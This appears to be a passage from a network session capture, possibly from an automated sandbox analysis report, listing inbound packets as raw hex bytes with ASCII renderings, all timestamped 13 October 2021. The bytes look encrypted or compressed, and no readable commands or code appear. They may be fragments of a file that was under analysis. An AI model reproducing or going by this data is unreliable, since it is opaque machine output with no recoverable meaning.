2021-10-13 19:03:03 UTC	1654	IN	Data Raw: 19 df 7e 68 1a 83 f8 a8 a9 ab 3e d4 66 60 05 3f ae 65 79 8f 16 0e de 92 23 68 f0 e9 a2 27 c5 ee 3d 12 a8 be 32 ac a3 fb 98 a0 09 8b 27 46 15 d1 3f 6b a3 5e f7 7e a6 85 ac 40 e8 07 16 85 24 d5 1d 8d b4 98 62 03 5f 32 c2 6e 80 16 87 b1 2b cb a9 a7 4e 1f b4 64 e2 aa 95 4f 0c 59 5c 6d b0 a2 7a 7f d7 bb ce 12 a4 0a fb 83 3d 0e ca 37 bb 83 4c c5 2a 92 26 fd 2c 18 66 da ac 0e 61 03 46 90 59 60 51 06 2d 28 d0 93 e0 51 1d 60 cd 1d 8e 67 09 37 4d 12 17 82 5b c6 f2 31 20 9e 5d b8 13 31 c6 8f 5d fe 1f 5c 15 69 08 d7 8e 3f 5c e6 4d 01 b6 6e 8c 53 83 ab cb 8f 8b 6f 40 cb 53 2a 85 f5 2a b7 2d 0d 46 26 a5 3f 87 b4 a1 fc 50 69 a3 8a b2 ed 11 b1 f5 ca 91 e8 7e 0d 76 5e d9 59 91 32 f0 b0 ef 57 88 39 5b 29 c8 1f 7b a9 09 14 63 c4 cf 0f 24 5a b0 dc d4 81 e0 61 9b c5 82 b5 e3 Data Ascii: ~h>f`?ey#h'=2'F?k^~@$b_2n+NdOY\mz=7L&,faFY`Q-(Q`g7M[1 ]1]\i?\MnSo@S*-F&?Pi~v^Y2W9[){c$Za
2021-10-13 19:03:03 UTC	1668	IN	Data Raw: 77 77 9c 04 89 5e df ce fa b3 ba 5c 1d fb c6 a3 fa 44 26 89 fd 14 e8 7c 14 6b 13 f0 81 9f a3 ef d9 07 df 9c e8 8b 47 ab 3f 7e cf d6 58 b0 ff c2 2b 27 45 ce 03 42 b2 d6 84 c4 90 3a 6d 3e ef 72 32 af 0c 5c c6 86 b9 a9 21 9f 91 f7 57 09 58 b2 c1 2d 35 12 3c 9f 64 36 b4 00 50 13 35 64 56 1e e2 9e 22 83 9e 70 f8 ed 0e 47 40 6b e6 51 76 26 4f 1e 49 15 c2 dc f9 eb 38 57 81 d4 10 f1 bb e2 b1 07 c3 d8 2d cf 0c 39 69 d3 bc 07 64 63 e0 59 6b f4 08 53 dc d0 22 65 6d 4f fd 15 48 fd f5 f1 bd 3b 10 fa a2 34 3d 19 a8 fe f5 67 1e ed 92 51 19 cb ae 60 f0 8b 10 c3 e5 3f b2 68 e9 33 59 e9 e9 98 8c bf 8a 7a 8b 40 c1 63 39 58 4f 64 e3 a2 7d 73 0c 0b 1e 7e 69 16 96 3c 3a c4 ae e4 e4 92 ca 0a f1 09 ba 7b f3 f9 af 8c c3 7b 6a d4 83 c2 2c 88 6f c7 ee 5a ff 45 a6 c3 cd 2f 33 4e 82 Data Ascii: ww^\D&\|kG?~X+'EB:m>r2\!WX-5<d6P5dV"pG@kQv&OI8W-9idcYkS"emOH;4=gQ`?h3Yz@c9XOd}s~i<:{{j,oZE/3N
2021-10-13 19:03:03 UTC	1683	IN	Data Raw: 80 dd 9b 30 bb d1 2a dc 73 64 c5 87 9b ec 65 df 8e 04 2f 2f c6 b5 9b 24 d7 2f d8 28 f7 41 07 4e a7 30 a5 62 9f 2a 8a 59 69 6c 69 38 ee 1a a7 e0 48 7d 74 e7 85 21 ed a3 8a f7 fc b5 9d ac 47 21 bf 89 46 6b 34 6f f3 30 3c 0b 4d bd 6b 12 21 38 cc 88 7f 86 15 72 29 78 22 5b 33 32 ad 4d 40 da e9 c8 e5 e2 56 13 72 1a e0 b1 f2 53 33 f0 bc 25 05 e9 b1 e0 6b 3e 9d 3e 0a b9 56 fe 0e ec f9 2c ad cf 6b 6a ae 92 53 93 cc 57 02 ca 5f e2 32 4f 05 82 94 47 d8 92 7a c0 c0 03 9f cb 22 dd d9 bb b8 13 f9 f4 47 dd 5e 77 fb fe e0 06 ff 36 27 e6 18 44 e9 6f 27 16 ea a3 69 09 74 c6 91 29 d0 04 86 48 ac ba 45 64 50 83 1b 72 94 36 1c 5b 7a 5b 9d 8b 34 1f 0f d8 a0 2f 16 04 62 f4 59 f2 99 69 84 07 80 d9 41 ec d8 94 ff f6 11 8f 7e b8 15 ff 3a 1e 0c 88 03 93 58 3f 33 45 cb 6b d4 e4 40 Data Ascii: 0sde//$/(AN0bYili8H}t!G!Fk4o0<Mk!8r)x"[32M@VrS3%k>>V,kjSW_2OGz"G^w6'Do'it)HEdPr6[z[4/bYiA~:X?3Ek@
2021-10-13 19:03:03 UTC	1686	IN	Data Raw: 80 7a 87 3d 05 3e 1d 89 4a 83 6a 8f ca 07 6e ba 48 77 90 e5 d3 44 88 c2 70 31 d1 f0 26 b7 cb ee e4 24 2c f1 60 77 78 35 05 e4 4e 65 37 cc c6 28 23 45 fc 94 26 b7 0b 75 79 0e cf f6 0f d7 cf 33 6d 51 6d 55 61 00 2f b4 95 5a 93 7d f4 86 d8 9e cd be b2 4c ec a2 b4 b8 eb 35 d1 dc 22 36 3b 35 0f 4a 0a 3e bf bd d2 37 a8 c4 eb bf ce 01 d0 9e 2b f4 4d c7 b9 f3 53 fd 4b 83 04 66 16 90 9f 5f 5f 45 b3 8e 56 31 b1 88 da ff 2a 56 c7 e7 ab 20 c2 0c 37 47 8b 39 f0 96 e6 e6 8c d9 ad 6b 81 1b 24 31 4a 81 2a 97 63 0c e9 b9 5d 69 6e d2 dd 79 98 da 73 1d c5 28 f6 60 ec 03 80 57 7e a1 30 a8 94 33 0b 48 07 3e 52 10 ca 20 8c 7e eb e8 42 5d 2c 04 d6 d1 f4 72 bf 0a 83 79 4e f9 c8 8e 14 eb 57 56 46 d6 22 0c 9e 25 72 8c f8 f7 13 f5 20 d3 ad 55 91 36 8a 89 9a 97 0c cb a6 dd ff ef 2c Data Ascii: z=>JjnHwDp1&$,`wx5Ne7(#E&uy3mQmUa/Z}L5"6;5J>7+MSKf__EV1V 7G9k$1Jc]inys(`W~03H>R ~B],ryNWVF"%r U6,
2021-10-13 19:03:03 UTC	1702	IN	Data Raw: 0b 9f 0f d7 d2 bd 1d 59 12 58 75 95 09 04 7a 63 6f 7a b1 1a 7b a4 a4 62 4a 36 37 23 ab c6 cf 8c 5d 6f a9 7f 67 03 a9 a1 a2 42 54 60 00 c6 55 72 03 3b 81 e8 82 25 19 2b 52 74 61 55 09 4b 00 20 00 3c 9a d0 91 df 47 0c ee 68 a3 00 06 8d 9d d8 23 66 be 4e 75 6f 2b 5a 98 5d 85 3f 5f 73 52 e4 b3 91 b1 27 8b 65 73 dd 74 8a e7 c1 f2 89 85 f1 71 89 ef d1 d8 dc ca 18 64 89 60 0d 24 ea 6d db 31 26 3d 91 0f e6 0e a7 8d b9 46 69 fc f6 8a b3 9d 82 73 a3 c5 d3 49 97 ba 1f 3d 09 f5 5e c7 69 70 40 82 da 33 2c ca 0b 7a 21 73 91 1e 42 72 b8 39 09 9a 49 d4 0c 4f ec 72 70 c0 92 c0 33 6a 29 02 1e 85 4b 7d 20 4e ea 39 2e ee dc 81 27 0e 75 f8 80 97 cd dc 08 05 a7 07 88 ad f5 de b0 86 59 06 07 44 e5 10 18 97 0e 84 75 fc 7b 19 65 b2 a3 0f d6 0b 3d b9 4d 00 07 40 40 74 b9 bb ea 68 Data Ascii: YXuzcoz{bJ67#]ogBT`Ur;%+RtaUK <Gh#fNuo+Z]?_sR'estqd`$m1&=FisI=^ip@3,z!sBr9IOrp3j)K} N9.'uYDu{e=M@@th
2021-10-13 19:03:03 UTC	1718	IN	Data Raw: 42 12 88 8e e5 84 bb 35 b4 d5 93 81 20 a1 11 17 6d d1 e5 1e 59 6b 08 69 9b e3 9b 38 cd c8 fd ef 47 1b 4b a1 35 2e 22 75 cf b3 35 06 ba e1 df 67 2e de 28 50 16 13 93 41 43 31 62 1d 54 05 75 c3 be c3 50 1f b7 8e a7 fe 25 81 ab 0e 7b 71 99 3e cc f0 07 a2 1d 85 81 4e 50 46 41 cf ce 39 fd ed 99 55 fd 95 d4 a4 72 ba 23 33 88 d0 22 df c2 e7 c5 ef da 67 16 4a 09 80 e1 61 38 cf 8e cc 53 4d 79 50 9c d5 99 72 81 5a 38 98 0e 63 2d d4 56 40 ba 58 f2 cf d1 d2 c8 ac cf de 5f de 17 ef ed 91 1f 82 ce bf cb c3 55 49 c9 fe be 4a 57 6c b2 b0 90 88 4f 42 3c c1 36 6d 8e d5 dd c0 8c f4 13 ea 8a a9 aa 0b 73 53 ee 69 c9 68 2c 55 46 ae c4 f5 d1 3d 71 10 79 8b f0 d3 e0 b7 ae e9 cf e7 50 4d 2d de 44 30 0d d1 fa f0 52 83 de 22 01 d0 b8 dd 6e 49 5f 3b 83 80 3c c1 17 57 ad c8 b5 9f fd Data Ascii: B5 mYki8GK5."u5g.(PAC1bTuP%{q>NPFA9Ur#3"gJa8SMyPrZ8c-V@X_UIJWlOB<6msSih,UF=qyPM-D0R"nI_;<W
2021-10-13 19:03:03 UTC	1734	IN	Data Raw: e3 6e cc f6 b0 75 89 11 73 24 09 b7 c4 c1 6f 2a 67 47 ed c1 16 ea ee ab 36 34 f8 80 1a f3 6e 3a ac 8d 7f 78 dc c5 21 a2 34 20 d3 0d 34 93 de 19 71 af 07 83 e7 33 a5 3a 1d 08 71 2a a3 58 3b 83 99 b0 e8 5e 07 c4 77 19 50 7e b5 06 aa 0e bb 21 bb e6 47 24 2a 46 0d b7 53 37 8c ad f2 c3 86 70 b4 b6 ce 08 56 5c ad ff 0c 2e 70 d1 1f 78 ca ce 16 f1 2b 5d b3 33 8d 5e 09 fa b4 db 84 8a fe d1 c5 c8 d6 23 ec b1 ba dd 19 79 74 5c 33 ed 75 fb 81 d0 79 85 05 b2 55 2e 77 7a b3 2c a5 76 b2 aa 5d 3f 5f 2e 9c 76 eb 0c 6d a4 e2 e4 18 e1 56 33 a3 0b 16 cf 34 a9 28 9a 78 e9 e7 a4 c0 6c 19 5a 96 fe fb 37 a3 97 29 59 aa 5b 5b a9 83 de 88 c3 74 e7 d3 55 64 65 d4 63 12 dd 8b 2a 68 30 7f a2 f5 05 e1 94 e9 2e ef 30 92 e9 2e 6d 28 6c 25 9a 66 35 14 2b 97 cf d0 f8 b2 aa 82 b5 62 75 68 Data Ascii: nus$ogG64n:x!4 4q3:qX;^wP~!G$FS7pV\.px+]3^#yt\3uyU.wz,v]?_.vmV34(xlZ7)Y[[tUdech0.0.m(l%f5+buh
2021-10-13 19:03:03 UTC	1750	IN	Data Raw: 0d 67 67 bc 0d 82 a2 31 e3 4d d4 00 7f be 3a fd 7b 3b 8f d0 cf a7 b3 97 a2 cd 96 3a 88 56 f7 19 0b 4d 7c 36 20 c8 6b 86 22 20 83 b1 6e 54 22 2e 92 a3 fc bf 13 1c ab 9c 02 c2 f1 fc 76 f6 90 08 a6 15 a2 08 4d 74 59 b7 cd bb f9 24 e3 b3 12 2f ba 86 6b 8f d4 6a 69 5c c3 01 54 db 14 cc ae a8 d5 06 45 69 0f e9 03 64 b5 59 4f 16 7b 8a 70 16 61 24 27 e3 5e a7 4c 44 18 52 be f4 f9 bb 06 b6 fb 59 8b dd ee 8d c4 8b 10 7c 0c 0f b4 fb d8 2b 81 b0 7b 8c 12 6d f6 c8 7b 5d 01 cf 5b da 16 ee 68 0e d9 97 9d e5 77 e0 f6 63 a7 a9 e0 93 47 7b eb ef e3 2f 0e 1f d1 51 8c 69 8c 20 64 74 b8 f3 74 65 27 d2 7e 67 45 f2 36 c9 f7 a7 f7 49 2d f3 8e 9f 8c 23 6a 34 45 79 42 4c d4 f5 1d f0 7c 7b b9 a9 c6 e2 5c 3d cc bc 70 4b 0d f4 ef 36 9a 1e 1b 94 ba fb ff c3 22 bd 5f 1a 0a 44 c4 3e 65 Data Ascii: gg1M:{;:VM\|6 k" nT".vMtY$/kji\TEidYO{pa$'^LDRY\|+{m{][hwcG{/Qi dtte'~gE6I-#j4EyBL\|{\=pK6"_D>e
2021-10-13 19:03:03 UTC	1766	IN	Data Raw: b7 79 24 67 11 8d 1d b2 43 12 11 3d da 58 52 a5 3a 29 5f 60 32 7c 41 4c 06 48 c2 b0 85 c8 bd 1d 89 3e 78 26 c4 a2 44 69 89 1d 4c cb 63 84 18 fd 11 73 3f 3c 81 47 13 4c 1f 48 d8 27 88 74 89 33 8a e7 b0 08 26 3d 67 73 73 1e b6 cd c5 39 9d 84 18 17 c7 4a 53 a5 f9 7a 5a a9 1d 0d e0 9b 0b 35 ec b7 b3 0a 7a 40 09 48 2f 6b 86 e9 be 8f 77 20 46 cc 1d bc 5d a0 af 01 6a 52 90 b6 04 47 06 e9 b3 26 52 2d f5 5c fb 24 a8 d5 1c 06 11 ad 0e 66 bd 6c 3d b8 b5 61 fb c7 7e 72 a2 03 cc f4 20 a1 06 3e d0 57 a6 7a 76 04 51 37 41 d9 8b ac 24 31 13 c8 d3 bc e8 a3 7a 29 d5 b1 75 de 49 ab 71 df 5c f8 5d ed 4a 7c ed f0 86 de 92 d8 b8 ff 38 48 25 a4 d1 ad e9 58 97 73 61 99 39 86 59 0a 46 2e 56 c5 d7 9c e2 fb 94 94 8b 76 9d 78 d9 a6 7b 6c 79 95 07 f4 7e 6e 27 ba 40 98 6c d0 07 73 00 Data Ascii: y$gC=XR:)_`2\|ALH>x&DiLcs?<GLH't3&=gss9JSzZ5z@H/kw F]jRG&R-\$fl=a~r >WzvQ7A$1z)uIq\]J\|8H%Xsa9YF.Vvx{ly~n'@ls
2021-10-13 19:03:03 UTC	1782	IN	Data Raw: 6a 9b 12 fa 3e dc b9 0d 0f 69 5a 54 89 25 71 23 ec a2 12 74 bd 09 a0 7d 60 40 24 dc 9d 3b ea 67 5c 48 7d 3d ef 18 7c 2f ef 8d 88 98 b0 a0 b9 66 70 c5 e0 15 70 00 fd 47 38 26 c9 5e f9 db 1e a4 e9 e2 dd 69 cc 22 3e 25 40 77 b3 b8 de e3 a7 ca 7f 96 a4 e4 f7 e5 00 26 d9 2d 2e 20 2e 4e 81 ed 75 50 98 6e 89 b9 77 cf cb 3a ed e7 6a 91 5e 51 a9 4c fa 16 66 90 cc cb 8e 8a d1 68 69 1d 15 da 49 54 d0 ce 4f 48 b1 31 62 1f 2f 1a 0f d3 94 2b 9b 45 93 2a 4e 09 eb b2 dd 03 c8 be 76 ee f0 0a 94 29 91 75 93 bb b7 00 b1 75 9e 15 e8 19 6b 19 2d fa 68 fa 9b f1 91 ce 1e b4 e9 7a 29 b3 bb 22 b1 f6 a3 fb 93 d5 e4 24 e6 3b f2 8b ff 08 79 01 e2 73 df f3 00 fc 6c da 69 3d 3c a1 21 11 eb e7 9c c4 55 dd 75 09 ac c6 f2 e2 7d 0b 54 ff 5e 01 ae cd 42 2d 1f c0 8d ea 0f 3c f6 84 71 54 51 Data Ascii: j>iZT%q#t}`@$;g\H}=\|/fppG8&^i">%@w&-. .NuPnw:j^QLfhiITOH1b/+E*Nv)uuk-hz)"$;ysli=<!Uu}T^B-<qTQ
2021-10-13 19:03:03 UTC	1798	IN	Data Raw: 05 c7 29 4f e7 76 cc 5a cd d8 a4 d1 ae ca e0 ba fa 8f 4b 1b 18 79 9b d6 08 8a 16 03 ad a9 cb 89 34 70 e6 73 b9 e5 b8 fa 35 ab bc 50 28 49 1e 09 2b 90 04 ee f9 86 71 6d 75 25 1e 0b 33 35 8d 57 9e c6 9c b9 f8 57 57 41 fc e1 f2 5f 70 83 6f 32 fb 17 b7 24 b5 70 f6 cc e1 12 b4 03 91 dd 7a 30 b8 c8 59 bf ec d1 b9 b6 a0 e3 52 69 c5 7d 08 14 5d c9 0c 84 53 d8 16 b6 c6 89 28 d2 b8 dc fc cb 7d fd 1b 94 20 87 ce 9a 7c 1f 6c ef ab 37 3e 44 bf 3c 19 e3 20 d1 1d 6d 50 f9 64 0c f7 96 13 9b e9 b5 5f d6 5e d7 50 16 1c 79 30 bf 3e 10 ff 40 85 60 21 58 ac 42 ba 3d 4b af d6 50 b8 ff ec fa 97 a2 8f 5b 15 c6 c8 9d 0e c6 16 5c a6 be 86 e1 a0 bc 26 5b 64 e9 a5 92 81 7e ef e9 2f dc e1 ab 8f 4d e3 c7 36 7d 28 88 67 86 9d c2 d3 13 08 22 36 6a 17 91 7e 9f ec 58 75 a0 57 27 cd 3a 58 Data Ascii: )OvZKy4ps5P(I+qmu%35WWWA_po2$pz0YRi}]S(} \|l7>D< mPd_^Py0>@`!XB=KP[\&[d~/M6}(g"6j~XuW':X
2021-10-13 19:03:03 UTC	1814	IN	Data Raw: 08 d2 4b 43 25 9a e4 cc 9b 5c 96 70 05 79 fc d3 0d 83 d4 4a 07 7d 05 4e d6 54 44 e9 ac f4 fc 7e a6 45 e6 c5 61 0c 67 e4 48 ce b1 71 a2 1d 01 35 25 10 f5 bf 54 c8 e2 17 a0 93 84 a0 66 40 0f 0c a7 4d 51 8e 30 97 60 5f cf 11 04 18 0d 51 ef d5 4b ef f4 e1 3a b8 53 54 53 af 0c 58 0c d0 61 d4 16 c8 2c 70 59 42 e6 14 4b e5 ea 8f 36 3d d6 9b b6 29 39 81 e2 73 45 65 83 e8 56 8b 97 f8 63 69 94 31 dc a9 87 1f b1 23 1b da 5d 5b dd a7 fb 35 a1 d8 ae 5b ea af 6b 64 b9 98 a5 94 9e 68 88 15 a2 c0 97 a7 47 ee 90 5e 8c 50 02 06 7d 78 1a 66 77 cb 59 39 2b f8 ce a7 8b ee bd ba 1e 33 16 e5 b2 02 d0 5a d9 26 98 3a 47 6a 3f 32 6e 1e 10 fc 7c df 0a 33 b3 9e 38 ce e2 8b 4e 09 b5 d3 75 cf 74 1e 8f 7a 15 e9 a7 61 30 1c ed c2 4a cc 82 fe 77 71 ba 9e f6 17 b6 72 d4 48 5e 50 fe 6d cc Data Ascii: KC%\pyJ}NTD~EagHq5%Tf@MQ0`_QK:STSXa,pYBK6=)9sEeVci1#][5[kdhG^P}xfwY9+3Z&:Gj?2n\|38Nutza0JwqrH^Pm
2021-10-13 19:03:03 UTC	1830	IN	Data Raw: d3 d7 b5 51 41 28 b5 79 81 16 68 f3 c3 97 00 eb 41 a4 5e ae 4e bc 2d ea ce b7 c3 e7 7b 65 7b 46 e2 4c ea 5b be 52 b7 6c 45 0f 24 6d b3 96 f0 ed 93 12 86 b8 89 d9 1a 7e d4 76 c1 33 65 a2 72 6f 77 db 3f 04 5b f4 28 32 d4 60 4e 56 b0 45 6c cc 66 57 3a 75 a3 f4 12 50 3c dd 81 14 8d 67 3f b0 d4 d4 13 c6 74 77 8b 07 0c 89 03 96 cc 25 9e 9d 62 43 48 22 f4 c6 0c 85 01 87 6a 53 ea f0 e0 36 ec 58 18 4a 35 56 60 5e ad 6b c6 cb ef 6c c8 6e cb db c7 ca 9b e3 03 3a 4b ff b3 3a 5c f8 41 e9 c6 32 77 92 7b 44 24 d9 68 08 17 ad ab 88 b4 2e e7 b3 a6 62 3c 69 26 fc b5 37 ef 9a ce d0 f8 37 b3 5f f0 95 fd 9c 6d 28 c0 2c a2 d0 10 34 39 ce f8 8f 83 b0 fe 78 b1 76 4d fd 32 f0 4e 59 1a 89 6d 04 66 21 16 a5 b0 c9 34 c8 09 71 49 f8 50 b6 ca b2 a0 2b f5 02 16 87 3e 26 73 59 da 4c 03 Data Ascii: QA(yhA^N-{e{FL[RlE$m~v3erow?[(2`NVElfW:uP<g?tw%bCH"jS6XJ5V`^kln:K:\A2w{D$h.b<i&77_m(,49xvM2NYmf!4qIP+>&sYL
2021-10-13 19:03:03 UTC	1846	IN	Data Raw: c3 ba 70 5b 12 85 f5 e1 18 25 d3 bd 7a 31 b2 8d e0 82 f4 e3 ed f3 1b 60 a0 82 ab cc 54 9d d2 e1 82 dc 79 82 5e 24 9d b9 42 4d cf 3b 2e ef 35 f5 6d 7f 53 da 17 cd bd 14 f9 c1 09 8c 72 a0 7c fd 4c b8 98 a8 70 48 3c 23 a4 09 8d 84 4d ce 01 85 69 d1 a7 7b fe e0 75 6b a6 24 9d c0 2d b2 2c 9c 74 87 bd 58 4d 62 fd ec 32 07 76 04 21 e1 0e 63 68 f2 38 ae ed a1 96 3a e9 a3 2c 12 c9 d2 9b 32 d0 a9 64 b4 4a cd d6 23 27 2a 39 5b fc 25 3b af 48 c1 f6 54 3a cd c4 10 1a ea 35 19 ee 3d dd e4 0a a7 ab a6 42 a5 33 3d 5c cc 5e ae aa 49 6f 77 e9 ea 09 a5 82 ef b2 3c 6e 34 ff 3f b9 bd c6 c9 07 35 08 8f bf 66 f7 5c 50 86 dc ce 51 86 80 98 62 8b a7 3d 8a e6 23 25 b1 07 52 cd ee f7 4e ff 17 e8 cf b6 c5 43 de de 76 f9 06 1a 7d 2f 9e b3 4d c3 91 96 21 9e 01 cc 50 91 d8 f4 b7 d1 d7 Data Ascii: p[%z1`Ty^$BM;.5mSr\|LpH<#Mi{uk$-,tXMb2v!ch8:,2dJ#'*9[%;HT:5=B3=\^Iow<n4?5f\PQb=#%RNCv}/M!P
2021-10-13 19:03:03 UTC	1862	IN	Data Raw: 8e c0 56 9a dd 03 ad e0 ff b2 f0 1a 46 b8 5e b5 75 74 ac eb ba f2 31 e2 aa ce c8 e3 2b 13 4c 7d d5 ac 82 1e 04 41 f2 c1 d8 ab 10 1b 0e 38 4c 96 59 22 c7 1f df 17 cc 19 75 29 c1 91 d1 a1 a5 72 f9 12 f1 36 b1 88 f9 65 e7 0e 74 81 53 8e 94 71 8a a9 a9 61 8d 8b a5 b3 f6 7c d2 8c 34 84 6e 32 e3 62 82 90 19 0c 2a a8 c3 71 c3 16 d0 57 e1 b5 e2 23 a5 6f e5 76 cd 51 49 9e 30 1f 17 a3 b3 98 1e 88 33 bb 79 fe 8d 3e e2 c0 15 b1 af c1 0f b7 98 0a d5 e7 0e fc 66 f7 e7 7f cc ce 8f bd 76 b4 84 e0 f0 e6 a3 e5 27 a9 11 79 c3 41 78 67 c5 c8 e5 a4 14 07 fb e7 dc af a0 76 e7 d9 ae 21 8d 3b 59 7c 4d c1 10 22 56 4c bd b9 51 06 78 ad ad 33 fc 86 ae 16 0d 18 8b ab 53 76 f4 7f 20 af cf f7 72 9b aa 08 01 00 00 d8 5e 57 1e f9 3f 3e 2c 76 f4 6e a6 2e 47 1b 21 3b 07 38 03 dd 1b 0f c7 Data Ascii: VF^ut1+L}A8LY"u)r6etSqa\|4n2b*qW#ovQI03y>fv'yAxgv!;Y\|M"VLQx3Sv r^W?>,vn.G!;8
2021-10-13 19:03:03 UTC	1878	IN	Data Raw: c7 16 03 20 78 1a 55 c9 b6 8e a4 6e a8 14 a0 f5 ae 2b a1 17 cb c7 c0 63 b3 01 e5 57 b7 47 17 29 70 eb 07 41 77 38 be 57 59 e0 6e 85 c2 81 80 27 be 4e 0a d6 26 2c b8 47 53 8b d4 99 7b 4c aa f4 40 9a f4 03 2e 6f 96 70 76 d5 9e 95 c0 45 06 97 ea 83 60 ed bd ad c6 b0 4a 02 7e fd 11 98 eb 3b 95 c8 5a 5a 65 11 91 be bc 66 c3 81 fe e0 87 b0 0d 92 fb 08 10 e0 2f 2f 94 a4 94 19 7e 25 93 f6 d2 af f2 b3 a8 b7 b6 77 bf 23 7c d0 f3 7b f2 81 91 f5 20 34 7b dc f2 4b 3d f7 34 b0 df 40 59 1b db 06 14 74 a3 ab b6 9b d6 92 16 e1 a1 71 3b a7 f1 a2 63 f6 b0 bc 7e 1f a0 95 a8 a4 9c 34 29 e0 c7 57 28 e6 2f 94 9d 0e 53 a8 bd d1 3f 95 d5 f2 ad 76 78 a3 1d 97 d1 ef b1 c0 68 47 ed 41 3a a2 4e bb 6e e5 ad 0b b3 b3 a9 b5 dc 75 5c d7 65 43 f0 a3 7f cb e3 12 c2 0b a4 c0 ca be d4 fd a1 Data Ascii: xUn+cWG)pAw8WYn'N&,GS{L@.opvE`J~;ZZef//~%w#\|{ 4{K=4@Ytq;c~4)W(/S?vxhGA:Nnu\eC
2021-10-13 19:03:03 UTC	1894	IN	Data Raw: 9c eb 72 5d b1 2a db 5a 52 8f 02 1a 98 03 a9 8e 54 de 1d 21 a6 8e 94 86 f0 92 24 6d 96 93 d0 a2 46 66 29 97 2e b9 3d 9f 3f 98 56 20 8e c9 31 da a0 28 0d 5e af 1e 5e 21 e5 33 84 b9 a1 36 70 73 a6 03 7e ea 29 da 35 bd fc e9 d7 10 92 63 2b df c0 11 9b 14 0e ce a1 1e 9d 69 10 1f 49 bc 50 f4 ad 62 83 61 f1 8e 98 c9 2e 40 8e fd 2d fc 53 00 69 b9 eb 54 f9 c3 3b 0b 05 86 c2 16 3f 1d b4 e5 ed a8 dd 45 af ad 4b d6 f8 28 3e 84 5b e0 bb 2e 4a c2 2f 21 ba dd b1 da 96 b1 1c c2 8e 96 b3 e1 90 d2 15 9e f0 66 c7 bc 5c 71 5d 2d 06 cf c3 d8 9e 28 98 db 3c 01 bc 14 99 6b fc 09 d8 f1 ef a8 07 db 7b 6a 4f 2b 04 c0 4b a7 03 b7 37 ff b8 6e 30 22 ee fa 55 e9 08 ed 5f 70 c2 4e aa 9c f9 55 4f 3e 06 7c 16 61 66 fa 31 bb 94 75 56 6a 16 e5 84 d2 a9 8b 69 e8 c0 a5 e2 3d 1b 19 41 33 37 Data Ascii: r]*ZRT!$mFf).=?V 1(^^!36ps~)5c+iIPba.@-SiT;?EK(>[.J/!f\q]-(<k{jO+K7n0"U_pNUO>\|af1uVji=A37
2021-10-13 19:03:03 UTC	1910	IN	Data Raw: b5 76 5a 90 aa 2f ef a1 dd d2 63 95 4f e3 c7 e4 e8 78 34 db 7e b8 c7 87 ef ac ed 30 29 90 00 fb 63 b2 d1 75 05 ab 83 47 b1 23 d1 2c 73 a8 21 2b ca 3c b2 49 74 56 08 b3 11 88 e2 cc 3c cb 9d d1 0b 94 e3 27 e8 4c 74 8d b4 c3 b2 5b 22 b8 8e 83 3d 86 e1 72 e2 51 0c 3e 07 4d 46 45 ed bb 93 ff 84 53 9d 17 05 ee 60 a3 fa b2 2e 1f d9 9d 79 a2 47 2e 64 01 8f ea ee f2 53 24 92 b5 1a 00 af 06 29 fe 5b bb a9 db 59 7e 4d 60 40 07 5d e8 e0 9f 80 60 9c e1 57 84 c1 e1 cc 79 79 d7 88 4a a6 1d 14 23 02 1b 16 07 e5 25 65 c3 ee 46 3c ec 57 0c 3a 35 90 40 cd d5 ac ad 6c a6 4d c7 60 54 84 35 68 d0 4b c0 b0 0e 3c b6 68 47 18 ca c1 a8 47 cd d7 c9 f4 8e 08 16 6f 40 5f 9e ab 44 f3 b4 5d 55 61 f8 35 58 62 ea 0d 8a 9d 3e 30 7f 38 1f 39 82 14 05 8d 42 29 73 03 ec ae 61 c1 73 b9 34 bc Data Ascii: vZ/cOx4~0)cuG#,s!+<ItV<'Lt["=rQ>MFES`.yG.dS$)[Y~M`@]`WyyJ#%eF<W:5@lM`T5hK<hGGo@_D]Ua5Xb>089B)sas4
2021-10-13 19:03:03 UTC	1926	IN	Data Raw: 16 3e 47 38 31 56 be f5 7b 12 b0 10 a1 27 6f 2c 1a 32 cb 58 e2 ea dc 38 fc 14 9d 7e d2 e6 29 0a 2d 1b 43 83 7f cc b9 e0 bb ae 90 a7 e4 c8 b6 01 58 bc a5 a4 5f 4c eb d6 a5 0c c7 23 aa 12 eb 7d dc ee 6c 0f 3f 8e 4d 51 63 d3 0c 90 a8 83 0c dc ec ae c5 4f 5b ae e6 23 fe 15 a2 a9 c7 ac 32 ae d1 e9 ed c2 ea fe 9a b8 bc 8d 8c cb 89 fd 47 ff 54 e6 83 3a d9 b7 89 14 8c f2 f7 74 3b 52 54 73 7a 6c c5 fc ac e3 a3 7c 9f c8 b5 a0 9a 47 80 ff 6c 19 e3 40 f4 e5 47 9d f2 d5 2e be c5 0f e2 6e b4 1b 58 b6 cd 0d 63 cf 2e 43 7b 7c f5 a9 94 f6 3a 36 d4 12 7d eb d9 a3 c9 da 71 95 42 37 e2 60 4c 3c 88 ad 32 30 e8 c4 bb bb b2 d6 bf b1 d0 54 f0 c9 28 97 cf b2 49 f9 c2 0b 96 ba 24 23 16 bd 0e 43 4f 55 68 10 76 81 74 f0 bc c9 55 6a bc 98 1d a6 59 ba 86 44 6d d3 c2 25 11 8a 4e 67 ab Data Ascii: >G81V{'o,2X8~)-CX_L#}l?MQcO[#2GT:t;RTszl\|Gl@G.nXc.C{\|:6}qB7`L<20T(I$#COUhvtUjYDm%Ng
2021-10-13 19:03:03 UTC	1942	IN	Data Raw: d5 51 14 3a 7e 4d 99 37 57 a6 8a cf 3c 55 31 35 61 fd b6 cc e9 e7 03 31 36 7b ad f3 78 0f 94 86 77 1a cc 0d cb 20 20 8d bb c4 12 d1 50 0e 72 1c a7 ad c3 ef 02 72 83 4a 70 0a 7c 7e d3 31 e4 f1 7f 07 c5 d0 fa 63 a6 df 13 de 76 56 6b 06 06 03 35 ef a6 b7 1d 16 46 7a a4 89 1c 3e d2 0c b8 c2 fe af 5e 4f c2 66 12 4c ec 80 c4 90 02 c8 86 97 4b 92 68 a3 20 5d 59 04 a2 23 fc 19 fd 56 f4 4d 6f c1 cd 9e 0c 41 97 65 02 b2 0a 4c 46 ea 63 1a e3 32 64 6b dd 61 cf 93 29 a2 a7 2c 80 3c 69 c0 30 6a fe bf 70 ca 4b 16 8c a0 ea 9a 63 c8 c6 67 91 d6 47 3a 16 a4 0f 94 e8 c9 cd 94 22 ee 68 07 02 5b 5a 9b f6 cc cb 53 93 52 3f 34 9e 7d 2e 85 58 26 d2 17 be 92 08 19 53 72 b6 06 04 c8 26 88 0a 8a fd e7 a3 88 b2 67 eb 35 26 8b d9 a0 ea f7 80 3a 26 d5 05 d3 3b c4 26 3d 3f c2 bd cc fa Data Ascii: Q:~M7W<U15a16{xw 